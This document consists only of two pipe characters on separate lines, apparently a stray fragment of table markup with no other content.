|
|